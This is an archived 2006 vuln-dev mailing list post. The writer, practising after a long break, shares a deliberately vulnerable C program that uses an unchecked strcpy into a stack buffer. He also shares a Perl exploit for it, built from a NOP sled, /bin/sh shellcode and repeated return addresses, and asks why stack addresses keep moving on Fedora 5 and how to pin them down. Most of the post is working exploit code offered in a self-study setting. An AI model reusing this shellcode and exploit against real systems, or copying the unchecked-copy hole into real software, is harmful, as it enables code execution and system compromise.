[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

"Moving" Stack: my poor return address!

To: vuln-dev@xxxxxxxxxxxxxxxxx
Subject: "Moving" Stack: my poor return address!
From: Jack C <list-recv@xxxxxxxxxxx>
Date: Mon, 31 Jul 2006 22:03:33 -0400
Delivered-to: mailing list vuln-dev@xxxxxxxxxxxxxxxxx
Delivered-to: moderator for vuln-dev@xxxxxxxxxxxxxxxxx
List-help: <mailto:vuln-dev-help@securityfocus.com>
List-id: <vuln-dev.list-id.securityfocus.com>
List-post: <mailto:vuln-dev@securityfocus.com>
List-subscribe: <mailto:vuln-dev-subscribe@securityfocus.com>
List-unsubscribe: <mailto:vuln-dev-unsubscribe@securityfocus.com>
Mailing-list: contact vuln-dev-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Thunderbird 1.5.0.5 (Windows/20060719)

Hello,

To see if I still knew how to code simple buffer overflows after a longabsence from it, I threw together a quick vulnerable C program today andwrote and exploit for it. The whole process went great, until I went tofind the return address I wanted in the stack. I have a 4096 bytebuffer, and since I had the room I put in 2048 NOPs at the beggining ofthe buffer. However, when I run the exploit then open the core in gdb,the stack is always in a different place. And we're not talking aboutdifferent place by a few thousand bytes, either. One time I'll run itand the NOPs will be at 0xbfe4dab0, the next time they will.be at0xbf9af420. That's a HUGE distance away!

I'm running on Fedora 5. Is this a security thing that's new in the past2 years or so since I've coded one of these? Is there any way I caneither (1) make the stack sit still so I can point into it or (2) findout where it is during execution?


------- lame.c ------
#include <stdio.h>
#include <stdlib.h>

int main( int argc, char *argv[]) {

 char buffer[4096]; //we're gonna overflow this jawn

 if (argc!=2) {
   printf("Usage: %s <string to copy>\n",argv[0]);
   return 1;
 }

 strcpy(buffer,argv[1]); //tisk tisk tisk

 printf("Buffer now holds: %s\n",buffer);

 return 0;
}
-----end lame.c -----

------exp.pl -----
#!/usr/bin/perl

my $prog="/home/jack/break/lame";
my $buffer;

# shellcode - /bin/sh; uname -a; id | 89 bytes */
my $c0de="\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
        "\xff\xff\x03\x65\x63\x68\x6f\x20\x5b\x45\x6c\x65".
        "\x63\x74\x72\x6f\x6e\x69\x63\x53\x6f\x75\x6c\x73".
        "\x5d\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x3b".
        "\x20\x69\x64\x3b\x20\x03\x2d\x63\x02\x2f\x62\x69".
        "\x6e\x2f\x73\x68\x01";

$buffer="\x90"x(2048+(1024-length($c0de))); #NOPs
$buffer.=$c0de;                             #shellcode

$buffer.="\xc0\x15\x9d\xbf"x(1024/4); #retr addr: 0xbf9d15c0 WASin the middle...


# other addresses the NOPS were... look how far apart these are!
#0xbfe4dab0-0xbfe4e640
#0xbf9af420-0xbf9affa0

exec $prog, $buffer;
-----end exp.pl------

Thanks for looking, hope someone can lend a hand...

-Jack Carrozzo
jack   _{@}_   crepinc.com

Prev by Date: RE: Problem in IE's File Type Recognition
Previous by thread: RE: Problem in IE's File Type Recognition
Index(es):
- Date
- Thread